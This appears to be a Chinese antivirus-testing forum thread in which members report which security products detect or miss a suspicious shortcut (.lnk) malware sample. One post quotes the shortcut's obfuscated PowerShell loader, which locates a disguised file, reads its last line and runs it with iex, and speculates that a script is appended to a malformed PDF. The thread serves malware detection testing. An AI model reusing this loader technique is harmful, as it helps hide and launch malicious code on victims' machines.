suspicious lnk.2

显示全部楼层 · 发表于 2019-7-22 17:14:25

llcy 发表于 2019-7-22 17:11
文件: schtasks.exe (CL.Downloader!gen108)

诺顿？

显示全部楼层 · 发表于 2019-7-22 17:17:00

swizzer 发表于 2019-7-22 17:14
诺顿？

对的

显示全部楼层 · 发表于 2019-7-22 17:22:18

swizzer 发表于 2019-7-22 17:14
诺顿？

嗯

显示全部楼层 · 发表于 2019-7-22 19:03:44

拒绝访问
无法访问该网页

对象网址:

https://att.kafan.cn/forum.php?mo ... DN8MjE1NTE2Mw%3D%3D
原因: 对象被感染 Trojan.Multi.GenAutorunLnkFile.a

消息生成时间: 2019/7/22 19:03:33

显示全部楼层 · 发表于 2019-7-22 19:19:59

GD (BD ENGINE ONLY) SCAN MISS

显示全部楼层 · 发表于 2019-7-22 19:41:58

Emsisoft Anti-Malware
comunicazione clientela运行后拦截衍生物

显示全部楼层 · 发表于 2019-7-22 21:46:56

本帖最后由椿花湫月于 2019-7-22 21:51 编辑

发错了,编辑掉

显示全部楼层 · 发表于 2019-7-22 21:49:53

本帖最后由椿花湫月于 2019-7-22 21:53 编辑

Trendmicro Housecall miss
mbam miss

Avira miss

显示全部楼层 · 发表于 2019-7-22 22:39:26

本帖最后由 B100D1E55 于 2019-7-22 22:42 编辑

cd %public:~-15,9%;$m=ls -force -r -in comu*.*|select -last 1;$m=gc -LiteralPath $m|select -last 1;iex $m

所以嘞？最后这个
echo $m
选了畸形pdf的那个hrtynf字串？这总不会是什么实验样品吧……
比如把一个powershell script append到pdf末尾然后用这个快捷方式select然后iex，不过这样还是要过AMSI吧，顶多扫不出来

显示全部楼层 · 发表于 2019-7-23 08:18:32

来晚了，智量已入库，火绒miss，有空双击。。

[可疑文件] suspicious lnk.2

本帖子中包含更多资源

本帖子中包含更多资源